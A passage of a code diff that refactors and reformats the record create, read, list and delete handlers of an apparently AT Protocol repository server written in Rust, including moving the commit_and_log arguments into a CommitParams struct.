··· 1 - use crate::api::repo::record::utils::{commit_and_log, RecordOp}; 1 + use crate::api::repo::record::utils::{CommitParams, RecordOp, commit_and_log}; 2 2 use crate::api::repo::record::write::prepare_repo_write; 3 3 use crate::repo::tracking::TrackingBlockStore; 4 4 use crate::state::AppState; 5 5 use axum::{ 6 + Json, 6 7 extract::State, 7 8 http::{HeaderMap, StatusCode}, 8 9 response::{IntoResponse, Response}, 9 - Json, 10 10 }; 11 11 use cid::Cid; 12 12 use jacquard::types::string::Nsid; ··· 38 38 Ok(res) => res, 39 39 Err(err_res) => return err_res, 40 40 }; 41 - if let Some(swap_commit) = &input.swap_commit { 42 - if Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 41 + if let Some(swap_commit) = &input.swap_commit 42 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 43 43 return ( 44 44 StatusCode::CONFLICT, 45 45 Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 46 46 ) 47 47 .into_response(); 48 48 } 49 - } 50 49 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 51 50 let commit_bytes = match tracking_store.get(&current_root_cid).await { 52 51 Ok(Some(b)) => b, 53 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Commit block not found"}))).into_response(), 52 + _ => { 53 + return ( 54 + StatusCode::INTERNAL_SERVER_ERROR, 55 + Json(json!({"error": "InternalError", "message": "Commit block not found"})), 56 + ) 57 + .into_response(); 58 + } 54 59 }; 55 60 let commit = match Commit::from_cbor(&commit_bytes) { 56 61 Ok(c) => c, 57 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to parse commit"}))).into_response(), 62 + _ => { 63 + return ( 64 + StatusCode::INTERNAL_SERVER_ERROR, 65 + Json(json!({"error": "InternalError", "message": "Failed to parse commit"})), 66 + ) 67 + .into_response(); 68 + } 58 69 }; 59 - let mst = Mst::load( 60 - Arc::new(tracking_store.clone()), 61 - commit.data, 62 - None, 63 - ); 70 + let mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None); 64 71 let collection_nsid = match input.collection.parse::<Nsid>() { 65 72 Ok(n) => n, 66 - Err(_) => return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidCollection"}))).into_response(), 73 + Err(_) => { 74 + return ( 75 + StatusCode::BAD_REQUEST, 76 + Json(json!({"error": "InvalidCollection"})), 77 + ) 78 + .into_response(); 79 + } 67 80 }; 68 81 let key = format!("{}/{}", collection_nsid, input.rkey); 69 82 if let Some(swap_record_str) = &input.swap_record { ··· 88 101 Ok(c) => c, 89 102 Err(e) => { 90 103 error!("Failed to persist MST: {:?}", e); 91 - return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(); 104 + return ( 105 + StatusCode::INTERNAL_SERVER_ERROR, 106 + Json(json!({"error": "InternalError", "message": "Failed to persist MST"})), 107 + ) 108 + .into_response(); 92 109 } 93 110 }; 94 - let op = RecordOp::Delete { collection: input.collection, rkey: input.rkey, prev: prev_record_cid }; 111 + let op = RecordOp::Delete { 112 + collection: input.collection, 113 + rkey: input.rkey, 114 + prev: prev_record_cid, 115 + }; 95 116 let mut relevant_blocks = std::collections::BTreeMap::new(); 96 - if let Err(_) = new_mst.blocks_for_path(&key, &mut relevant_blocks).await { 117 + if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 97 118 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 98 119 } 99 - if let Err(_) = mst.blocks_for_path(&key, &mut relevant_blocks).await { 120 + if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 100 121 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 101 122 } 102 123 let mut written_cids = tracking_store.get_all_relevant_cids(); ··· 105 126 written_cids.push(*cid); 106 127 } 107 128 } 108 - let written_cids_str = written_cids.iter().map(|c| c.to_string()).collect::<Vec<_>>(); 109 - if let Err(e) = commit_and_log(&state, &did, user_id, Some(current_root_cid), Some(commit.data), new_mst_root, vec![op], &written_cids_str).await { 110 - return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": e}))).into_response(); 129 + let written_cids_str = written_cids 130 + .iter() 131 + .map(|c| c.to_string()) 132 + .collect::<Vec<_>>(); 133 + if let Err(e) = commit_and_log( 134 + &state, 135 + CommitParams { 136 + did: &did, 137 + user_id, 138 + current_root_cid: Some(current_root_cid), 139 + prev_data_cid: Some(commit.data), 140 + new_mst_root, 141 + ops: vec![op], 142 + blocks_cids: &written_cids_str, 143 + }, 144 + ) 145 + .await 146 + { 147 + return ( 148 + StatusCode::INTERNAL_SERVER_ERROR, 149 + Json(json!({"error": "InternalError", "message": e})), 150 + ) 151 + .into_response(); 111 152 }; 112 153 (StatusCode::OK, Json(json!({}))).into_response() 113 154 }
+1 -1
src/api/repo/record/mod.rs
··· 11 11 pub use utils::*; 12 12 pub use write::{ 13 13 CreateRecordInput, CreateRecordOutput, PutRecordInput, PutRecordOutput, create_record, 14 - put_record, prepare_repo_write, 14 + prepare_repo_write, put_record, 15 15 };
+10 -9
src/api/repo/record/read.rs
··· 71 71 .into_response(); 72 72 } 73 73 }; 74 - if let Some(expected_cid) = &input.cid { 75 - if &record_cid_str != expected_cid { 74 + if let Some(expected_cid) = &input.cid 75 + && &record_cid_str != expected_cid { 76 76 return ( 77 77 StatusCode::NOT_FOUND, 78 78 Json(json!({"error": "NotFound", "message": "Record CID mismatch"})), 79 79 ) 80 80 .into_response(); 81 81 } 82 - } 83 82 let cid = match Cid::from_str(&record_cid_str) { 84 83 Ok(c) => c, 85 84 Err(_) => { ··· 192 191 param_idx += 1; 193 192 } 194 193 if input.rkey_end.is_some() { 195 - conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" }); 194 + conditions.push(if param_idx == 3 { 195 + "rkey < $3" 196 + } else { 197 + "rkey < $4" 198 + }); 196 199 param_idx += 1; 197 200 } 198 201 let limit_idx = param_idx; ··· 246 249 }; 247 250 let mut records = Vec::new(); 248 251 for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) { 249 - if let Some(block) = block_opt { 250 - if let Some((rkey, cid_str)) = cid_to_rkey.get(cid) { 251 - if let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) { 252 + if let Some(block) = block_opt 253 + && let Some((rkey, cid_str)) = cid_to_rkey.get(cid) 254 + && let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) { 252 255 records.push(json!({ 253 256 "uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey), 254 257 "cid": cid_str, 255 258 "value": value 256 259 })); 257 260 } 258 - } 259 - } 260 261 } 261 262 Json(ListRecordsOutput { 262 263 cursor: last_rkey,
+150 -74
src/api/repo/record/utils.rs
··· 3 3 use cid::Cid; 4 4 use jacquard::types::{integer::LimitedU32, string::Tid}; 5 5 use jacquard_repo::storage::BlockStore; 6 - use k256::ecdsa::{signature::Signer, Signature, SigningKey}; 6 + use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 7 7 use serde::Serialize; 8 8 use serde_json::json; 9 9 use uuid::Uuid; ··· 71 71 } 72 72 73 73 pub enum RecordOp { 74 - Create { collection: String, rkey: String, cid: Cid }, 75 - Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> }, 76 - Delete { collection: String, rkey: String, prev: Option<Cid> }, 74 + Create { 75 + collection: String, 76 + rkey: String, 77 + cid: Cid, 78 + }, 79 + Update { 80 + collection: String, 81 + rkey: String, 82 + cid: Cid, 83 + prev: Option<Cid>, 84 + }, 85 + Delete { 86 + collection: String, 87 + rkey: String, 88 + prev: Option<Cid>, 89 + }, 77 90 } 78 91 79 92 pub struct CommitResult { ··· 81 94 pub rev: String, 82 95 } 83 96 97 + pub struct CommitParams<'a> { 98 + pub did: &'a str, 99 + pub user_id: Uuid, 100 + pub current_root_cid: Option<Cid>, 101 + pub prev_data_cid: Option<Cid>, 102 + pub new_mst_root: Cid, 103 + pub ops: Vec<RecordOp>, 104 + pub blocks_cids: &'a [String], 105 + } 106 + 84 107 pub async fn commit_and_log( 85 108 state: &AppState, 86 - did: &str, 87 - user_id: Uuid, 88 - current_root_cid: Option<Cid>, 89 - prev_data_cid: Option<Cid>, 90 - new_mst_root: Cid, 91 - ops: Vec<RecordOp>, 92 - blocks_cids: &[String], 109 + params: CommitParams<'_>, 93 110 ) -> Result<CommitResult, String> { 111 + let CommitParams { 112 + did, 113 + user_id, 114 + current_root_cid, 115 + prev_data_cid, 116 + new_mst_root, 117 + ops, 118 + blocks_cids, 119 + } = params; 94 120 let key_row = sqlx::query!( 95 121 "SELECT key_bytes, encryption_version FROM user_keys WHERE user_id = $1", 96 122 user_id ··· 100 126 .map_err(|e| format!("Failed to fetch signing key: {}", e))?; 101 127 let key_bytes = crate::config::decrypt_key(&key_row.key_bytes, key_row.encryption_version) 102 128 .map_err(|e| format!("Failed to decrypt signing key: {}", e))?; 103 - let signing_key = SigningKey::from_slice(&key_bytes) 104 - .map_err(|e| format!("Invalid signing key: {}", e))?; 129 + let signing_key = 130 + SigningKey::from_slice(&key_bytes).map_err(|e| format!("Invalid signing key: {}", e))?; 105 131 let rev = Tid::now(LimitedU32::MIN); 106 132 let rev_str = rev.to_string(); 107 - let (new_commit_bytes, _sig) = create_signed_commit( 108 - did, 109 - new_mst_root, 110 - &rev_str, 111 - current_root_cid, 112 - &signing_key, 113 - )?; 114 - let new_root_cid = state.block_store.put(&new_commit_bytes).await 133 + let (new_commit_bytes, _sig) = 134 + create_signed_commit(did, new_mst_root, &rev_str, current_root_cid, &signing_key)?; 135 + let new_root_cid = state 136 + .block_store 137 + .put(&new_commit_bytes) 138 + .await 115 139 .map_err(|e| format!("Failed to save commit block: {:?}", e))?; 116 - let mut tx = state.db.begin().await 140 + let mut tx = state 141 + .db 142 + .begin() 143 + .await 117 144 .map_err(|e| format!("Failed to begin transaction: {}", e))?; 118 145 let lock_result = sqlx::query!( 119 146 "SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT", ··· 123 150 .await; 124 151 match lock_result { 125 152 Err(e) => { 126 - if let Some(db_err) = e.as_database_error() { 127 - if db_err.code().as_deref() == Some("55P03") { 128 - return Err("ConcurrentModification: Another request is modifying this repo".to_string()); 153 + if let Some(db_err) = e.as_database_error() 154 + && db_err.code().as_deref() == Some("55P03") { 155 + return Err( 156 + "ConcurrentModification: Another request is modifying this repo" 157 + .to_string(), 158 + ); 129 159 } 130 - } 131 160 return Err(format!("Failed to acquire repo lock: {}", e)); 132 161 } 133 162 Ok(Some(row)) => { 134 - if let Some(expected_root) = &current_root_cid { 135 - if row.repo_root_cid != expected_root.to_string() { 136 - return Err("ConcurrentModification: Repo has been modified since last read".to_string()); 163 + if let Some(expected_root) = &current_root_cid 164 + && row.repo_root_cid != expected_root.to_string() { 165 + return Err( 166 + "ConcurrentModification: Repo has been modified since last read" 167 + .to_string(), 168 + ); 137 169 } 138 - } 139 170 } 140 171 Ok(None) => { 141 172 return Err("Repo not found".to_string()); 142 173 } 143 174 } 144 - sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id) 145 - .execute(&mut *tx) 146 - .await 147 - .map_err(|e| format!("DB Error (repos): {}", e))?; 175 + sqlx::query!( 176 + "UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", 177 + new_root_cid.to_string(), 178 + user_id 179 + ) 180 + .execute(&mut *tx) 181 + .await 182 + .map_err(|e| format!("DB Error (repos): {}", e))?; 148 183 let mut upsert_collections: Vec<String> = Vec::new(); 149 184 let mut upsert_rkeys: Vec<String> = Vec::new(); 150 185 let mut upsert_cids: Vec<String> = Vec::new(); ··· 152 187 let mut delete_rkeys: Vec<String> = Vec::new(); 153 188 for op in &ops { 154 189 match op { 155 - RecordOp::Create { collection, rkey, cid } | RecordOp::Update { collection, rkey, cid, .. } => { 190 + RecordOp::Create { 191 + collection, 192 + rkey, 193 + cid, 194 + } 195 + | RecordOp::Update { 196 + collection, 197 + rkey, 198 + cid, 199 + .. 200 + } => { 156 201 upsert_collections.push(collection.clone()); 157 202 upsert_rkeys.push(rkey.clone()); 158 203 upsert_cids.push(cid.to_string()); 159 204 } 160 - RecordOp::Delete { collection, rkey, .. } => { 205 + RecordOp::Delete { 206 + collection, rkey, .. 207 + } => { 161 208 delete_collections.push(collection.clone()); 162 209 delete_rkeys.push(rkey.clone()); 163 210 } ··· 197 244 .await 198 245 .map_err(|e| format!("DB Error (records batch delete): {}", e))?; 199 246 } 200 - let ops_json = ops.iter().map(|op| { 201 - match op { 202 - RecordOp::Create { collection, rkey, cid } => json!({ 247 + let ops_json = ops 248 + .iter() 249 + .map(|op| match op { 250 + RecordOp::Create { 251 + collection, 252 + rkey, 253 + cid, 254 + } => json!({ 203 255 "action": "create", 204 256 "path": format!("{}/{}", collection, rkey), 205 257 "cid": cid.to_string() 206 258 }), 207 - RecordOp::Update { collection, rkey, cid, prev } => { 259 + RecordOp::Update { 260 + collection, 261 + rkey, 262 + cid, 263 + prev, 264 + } => { 208 265 let mut obj = json!({ 209 266 "action": "update", 210 267 "path": format!("{}/{}", collection, rkey), ··· 214 271 obj["prev"] = json!(prev_cid.to_string()); 215 272 } 216 273 obj 217 - }, 218 - RecordOp::Delete { collection, rkey, prev } => { 274 + } 275 + RecordOp::Delete { 276 + collection, 277 + rkey, 278 + prev, 279 + } => { 219 280 let mut obj = json!({ 220 281 "action": "delete", 221 282 "path": format!("{}/{}", collection, rkey), ··· 225 286 obj["prev"] = json!(prev_cid.to_string()); 226 287 } 227 288 obj 228 - }, 229 - } 230 - }).collect::<Vec<_>>(); 289 + } 290 + }) 291 + .collect::<Vec<_>>(); 231 292 let event_type = "commit"; 232 293 let prev_cid_str = current_root_cid.map(|c| c.to_string()); 233 294 let prev_data_cid_str = prev_data_cid.map(|c| c.to_string()); ··· 249 310 .fetch_one(&mut *tx) 250 311 .await 251 312 .map_err(|e| format!("DB Error (repo_seq): {}", e))?; 252 - sqlx::query( 253 - &format!("NOTIFY repo_updates, '{}'", seq_row.seq) 254 - ) 255 - .execute(&mut *tx) 256 - .await 257 - .map_err(|e| format!("DB Error (notify): {}", e))?; 258 - tx.commit().await 313 + sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq)) 314 + .execute(&mut *tx) 315 + .await 316 + .map_err(|e| format!("DB Error (notify): {}", e))?; 317 + tx.commit() 318 + .await 259 319 .map_err(|e| format!("Failed to commit transaction: {}", e))?; 260 320 let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await; 261 321 Ok(CommitResult { ··· 278 338 .await 279 339 .map_err(|e| format!("DB error: {}", e))? 280 340 .ok_or_else(|| "User not found".to_string())?; 281 - let root_cid_str: String = 282 - sqlx::query_scalar!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id) 283 - .fetch_optional(&state.db) 284 - .await 285 - .map_err(|e| format!("DB error: {}", e))? 286 - .ok_or_else(|| "Repo not found".to_string())?; 287 - let current_root_cid = Cid::from_str(&root_cid_str) 288 - .map_err(|_| "Invalid repo root CID".to_string())?; 341 + let root_cid_str: String = sqlx::query_scalar!( 342 + "SELECT repo_root_cid FROM repos WHERE user_id = $1", 343 + user_id 344 + ) 345 + .fetch_optional(&state.db) 346 + .await 347 + .map_err(|e| format!("DB error: {}", e))? 348 + .ok_or_else(|| "Repo not found".to_string())?; 349 + let current_root_cid = 350 + Cid::from_str(&root_cid_str).map_err(|_| "Invalid repo root CID".to_string())?; 289 351 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 290 - let commit_bytes = tracking_store.get(&current_root_cid).await 352 + let commit_bytes = tracking_store 353 + .get(&current_root_cid) 354 + .await 291 355 .map_err(|e| format!("Failed to fetch commit: {:?}", e))? 292 356 .ok_or_else(|| "Commit block not found".to_string())?; 293 357 let commit = jacquard_repo::commit::Commit::from_cbor(&commit_bytes) ··· 296 360 let mut record_bytes = Vec::new(); 297 361 serde_ipld_dagcbor::to_writer(&mut record_bytes, record) 298 362 .map_err(|e| format!("Failed to serialize record: {:?}", e))?; 299 - let record_cid = tracking_store.put(&record_bytes).await 363 + let record_cid = tracking_store 364 + .put(&record_bytes) 365 + .await 300 366 .map_err(|e| format!("Failed to save record block: {:?}", e))?; 301 367 let key = format!("{}/{}", collection, rkey); 302 - let new_mst = mst.add(&key, record_cid).await 368 + let new_mst = mst 369 + .add(&key, record_cid) 370 + .await 303 371 .map_err(|e| format!("Failed to add to MST: {:?}", e))?; 304 - let new_mst_root = new_mst.persist().await 372 + let new_mst_root = new_mst 373 + .persist() 374 + .await 305 375 .map_err(|e| format!("Failed to persist MST: {:?}", e))?; 306 376 let op = RecordOp::Create { 307 377 collection: collection.to_string(), ··· 309 379 cid: record_cid, 310 380 }; 311 381 let mut relevant_blocks = std::collections::BTreeMap::new(); 312 - new_mst.blocks_for_path(&key, &mut relevant_blocks).await 382 + new_mst 383 + .blocks_for_path(&key, &mut relevant_blocks) 384 + .await 313 385 .map_err(|e| format!("Failed to get new MST blocks for path: {:?}", e))?; 314 - mst.blocks_for_path(&key, &mut relevant_blocks).await 386 + mst.blocks_for_path(&key, &mut relevant_blocks) 387 + .await 315 388 .map_err(|e| format!("Failed to get old MST blocks for path: {:?}", e))?; 316 389 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes)); 317 390 let mut written_cids = tracking_store.get_all_relevant_cids(); ··· 323 396 let written_cids_str: Vec<String> = written_cids.iter().map(|c| c.to_string()).collect(); 324 397 let result = commit_and_log( 325 398 state, 326 - did, 327 - user_id, 328 - Some(current_root_cid), 329 - Some(commit.data), 330 - new_mst_root, 331 - vec![op], 332 - &written_cids_str, 333 - ).await?; 399 + CommitParams { 400 + did, 401 + user_id, 402 + current_root_cid: Some(current_root_cid), 403 + prev_data_cid: Some(commit.data), 404 + new_mst_root, 405 + ops: vec![op], 406 + blocks_cids: &written_cids_str, 407 + }, 408 + ) 409 + .await?; 334 410 let uri = format!("at://{}/{}/{}", did, collection, rkey); 335 411 Ok((uri, result.commit_cid)) 336 412 }
+14 -14
src/api/repo/record/validation.rs
··· 1 1 use crate::validation::{RecordValidator, ValidationError}; 2 2 use axum::{ 3 + Json, 3 4 http::StatusCode, 4 5 response::{IntoResponse, Response}, 5 - Json, 6 6 }; 7 7 use serde_json::json; 8 8 9 - pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Response> { 9 + pub fn validate_record(record: &serde_json::Value, collection: &str) -> Result<(), Box<Response>> { 10 10 let validator = RecordValidator::new(); 11 11 match validator.validate(record, collection) { 12 12 Ok(_) => Ok(()), 13 - Err(ValidationError::MissingType) => Err(( 13 + Err(ValidationError::MissingType) => Err(Box::new(( 14 14 StatusCode::BAD_REQUEST, 15 15 Json(json!({"error": "InvalidRecord", "message": "Record must have a $type field"})), 16 - ).into_response()), 17 - Err(ValidationError::TypeMismatch { expected, actual }) => Err(( 16 + ).into_response())), 17 + Err(ValidationError::TypeMismatch { expected, actual }) => Err(Box::new(( 18 18 StatusCode::BAD_REQUEST, 19 19 Json(json!({"error": "InvalidRecord", "message": format!("Record $type '{}' does not match collection '{}'", actual, expected)})), 20 - ).into_response()), 21 - Err(ValidationError::MissingField(field)) => Err(( 20 + ).into_response())), 21 + Err(ValidationError::MissingField(field)) => Err(Box::new(( 22 22 StatusCode::BAD_REQUEST, 23 23 Json(json!({"error": "InvalidRecord", "message": format!("Missing required field: {}", field)})), 24 - ).into_response()), 25 - Err(ValidationError::InvalidField { path, message }) => Err(( 24 + ).into_response())), 25 + Err(ValidationError::InvalidField { path, message }) => Err(Box::new(( 26 26 StatusCode::BAD_REQUEST, 27 27 Json(json!({"error": "InvalidRecord", "message": format!("Invalid field '{}': {}", path, message)})), 28 - ).into_response()), 29 - Err(ValidationError::InvalidDatetime { path }) => Err(( 28 + ).into_response())), 29 + Err(ValidationError::InvalidDatetime { path }) => Err(Box::new(( 30 30 StatusCode::BAD_REQUEST, 31 31 Json(json!({"error": "InvalidRecord", "message": format!("Invalid datetime format at '{}'", path)})), 32 - ).into_response()), 33 - Err(e) => Err(( 32 + ).into_response())), 33 + Err(e) => Err(Box::new(( 34 34 StatusCode::BAD_REQUEST, 35 35 Json(json!({"error": "InvalidRecord", "message": e.to_string()})), 36 - ).into_response()), 36 + ).into_response())), 37 37 } 38 38 }
+243 -85
src/api/repo/record/write.rs
··· 1 1 use super::validation::validate_record; 2 - use crate::api::repo::record::utils::{commit_and_log, RecordOp}; 2 + use crate::api::repo::record::utils::{CommitParams, RecordOp, commit_and_log}; 3 3 use crate::repo::tracking::TrackingBlockStore; 4 4 use crate::state::AppState; 5 5 use axum::{ 6 + Json, 6 7 extract::State, 7 8 http::{HeaderMap, StatusCode}, 8 9 response::{IntoResponse, Response}, 9 - Json, 10 10 }; 11 11 use cid::Cid; 12 - use jacquard::types::{integer::LimitedU32, string::{Nsid, Tid}}; 12 + use jacquard::types::{ 13 + integer::LimitedU32, 14 + string::{Nsid, Tid}, 15 + }; 13 16 use jacquard_repo::{commit::Commit, mst::Mst, storage::BlockStore}; 14 17 use serde::{Deserialize, Serialize}; 15 18 use serde_json::json; ··· 19 22 use tracing::error; 20 23 use uuid::Uuid; 21 24 22 - pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> { 25 + pub async fn has_verified_notification_channel( 26 + db: &PgPool, 27 + did: &str, 28 + ) -> Result<bool, sqlx::Error> { 23 29 let row = sqlx::query( 24 30 r#" 25 31 SELECT ··· 29 35 signal_verified 30 36 FROM users 31 37 WHERE did = $1 32 - "# 38 + "#, 33 39 ) 34 40 .bind(did) 35 41 .fetch_optional(db) ··· 52 58 repo_did: &str, 53 59 ) -> Result<(String, Uuid, Cid), Response> { 54 60 let token = crate::auth::extract_bearer_token_from_header( 55 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 56 - ).ok_or_else(|| { 61 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 62 + ) 63 + .ok_or_else(|| { 57 64 ( 58 65 StatusCode::UNAUTHORIZED, 59 66 Json(json!({"error": "AuthenticationRequired"})), ··· 102 109 .await 103 110 .map_err(|e| { 104 111 error!("DB error fetching user: {}", e); 105 - (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError"}))).into_response() 112 + ( 113 + StatusCode::INTERNAL_SERVER_ERROR, 114 + Json(json!({"error": "InternalError"})), 115 + ) 116 + .into_response() 106 117 })? 107 118 .ok_or_else(|| { 108 119 ( ··· 111 122 ) 112 123 .into_response() 113 124 })?; 114 - let root_cid_str: String = 115 - sqlx::query_scalar!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id) 116 - .fetch_optional(&state.db) 117 - .await 118 - .map_err(|e| { 119 - error!("DB error fetching repo root: {}", e); 120 - (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError"}))).into_response() 121 - })? 122 - .ok_or_else(|| { 123 - ( 124 - StatusCode::INTERNAL_SERVER_ERROR, 125 - Json(json!({"error": "InternalError", "message": "Repo root not found"})), 126 - ) 127 - .into_response() 128 - })?; 125 + let root_cid_str: String = sqlx::query_scalar!( 126 + "SELECT repo_root_cid FROM repos WHERE user_id = $1", 127 + user_id 128 + ) 129 + .fetch_optional(&state.db) 130 + .await 131 + .map_err(|e| { 132 + error!("DB error fetching repo root: {}", e); 133 + ( 134 + StatusCode::INTERNAL_SERVER_ERROR, 135 + Json(json!({"error": "InternalError"})), 136 + ) 137 + .into_response() 138 + })? 139 + .ok_or_else(|| { 140 + ( 141 + StatusCode::INTERNAL_SERVER_ERROR, 142 + Json(json!({"error": "InternalError", "message": "Repo root not found"})), 143 + ) 144 + .into_response() 145 + })?; 129 146 let current_root_cid = Cid::from_str(&root_cid_str).map_err(|_| { 130 147 ( 131 148 StatusCode::INTERNAL_SERVER_ERROR, ··· 162 179 Ok(res) => res, 163 180 Err(err_res) => return err_res, 164 181 }; 165 - if let Some(swap_commit) = &input.swap_commit { 166 - if Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 182 + if let Some(swap_commit) = &input.swap_commit 183 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 167 184 return ( 168 185 StatusCode::CONFLICT, 169 186 Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 170 187 ) 171 188 .into_response(); 172 189 } 173 - } 174 190 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 175 191 let commit_bytes = match tracking_store.get(&current_root_cid).await { 176 192 Ok(Some(b)) => b, 177 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Commit block not found"}))).into_response(), 193 + _ => { 194 + return ( 195 + StatusCode::INTERNAL_SERVER_ERROR, 196 + Json(json!({"error": "InternalError", "message": "Commit block not found"})), 197 + ) 198 + .into_response(); 199 + } 178 200 }; 179 201 let commit = match Commit::from_cbor(&commit_bytes) { 180 202 Ok(c) => c, 181 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to parse commit"}))).into_response(), 203 + _ => { 204 + return ( 205 + StatusCode::INTERNAL_SERVER_ERROR, 206 + Json(json!({"error": "InternalError", "message": "Failed to parse commit"})), 207 + ) 208 + .into_response(); 209 + } 182 210 }; 183 - let mst = Mst::load( 184 - Arc::new(tracking_store.clone()), 185 - commit.data, 186 - None, 187 - ); 211 + let mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None); 188 212 let collection_nsid = match input.collection.parse::<Nsid>() { 189 213 Ok(n) => n, 190 - Err(_) => return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidCollection"}))).into_response(), 214 + Err(_) => { 215 + return ( 216 + StatusCode::BAD_REQUEST, 217 + Json(json!({"error": "InvalidCollection"})), 218 + ) 219 + .into_response(); 220 + } 191 221 }; 192 - if input.validate.unwrap_or(true) { 193 - if let Err(err_response) = validate_record(&input.record, &input.collection) { 194 - return err_response; 222 + if input.validate.unwrap_or(true) 223 + && let Err(err_response) = validate_record(&input.record, &input.collection) { 224 + return *err_response; 195 225 } 196 - } 197 - let rkey = input.rkey.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); 226 + let rkey = input 227 + .rkey 228 + .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); 198 229 let mut record_bytes = Vec::new(); 199 230 if serde_ipld_dagcbor::to_writer(&mut record_bytes, &input.record).is_err() { 200 - return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response(); 231 + return ( 232 + StatusCode::BAD_REQUEST, 233 + Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"})), 234 + ) 235 + .into_response(); 201 236 } 202 237 let record_cid = match tracking_store.put(&record_bytes).await { 203 238 Ok(c) => c, 204 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to save record block"}))).into_response(), 239 + _ => { 240 + return ( 241 + StatusCode::INTERNAL_SERVER_ERROR, 242 + Json(json!({"error": "InternalError", "message": "Failed to save record block"})), 243 + ) 244 + .into_response(); 245 + } 205 246 }; 206 247 let key = format!("{}/{}", collection_nsid, rkey); 207 248 let new_mst = match mst.add(&key, record_cid).await { 208 249 Ok(m) => m, 209 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to add to MST"}))).into_response(), 250 + _ => { 251 + return ( 252 + StatusCode::INTERNAL_SERVER_ERROR, 253 + Json(json!({"error": "InternalError", "message": "Failed to add to MST"})), 254 + ) 255 + .into_response(); 256 + } 210 257 }; 211 258 let new_mst_root = match new_mst.persist().await { 212 259 Ok(c) => c, 213 - _ => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(), 260 + _ => { 261 + return ( 262 + StatusCode::INTERNAL_SERVER_ERROR, 263 + Json(json!({"error": "InternalError", "message": "Failed to persist MST"})), 264 + ) 265 + .into_response(); 266 + } 267 + }; 268 + let op = RecordOp::Create { 269 + collection: input.collection.clone(), 270 + rkey: rkey.clone(), 271 + cid: record_cid, 214 272 }; 215 - let op = RecordOp::Create { collection: input.collection.clone(), rkey: rkey.clone(), cid: record_cid }; 216 273 let mut relevant_blocks = std::collections::BTreeMap::new(); 217 - if let Err(_) = new_mst.blocks_for_path(&key, &mut relevant_blocks).await { 274 + if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 218 275 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 219 276 } 220 - if let Err(_) = mst.blocks_for_path(&key, &mut relevant_blocks).await { 277 + if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() { 221 278 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 222 279 } 223 280 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes)); ··· 227 284 written_cids.push(*cid); 228 285 } 229 286 } 230 - let written_cids_str = written_cids.iter().map(|c| c.to_string()).collect::<Vec<_>>(); 231 - if let Err(e) = commit_and_log(&state, &did, user_id, Some(current_root_cid), Some(commit.data), new_mst_root, vec![op], &written_cids_str).await { 232 - return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": e}))).into_response(); 287 + let written_cids_str = 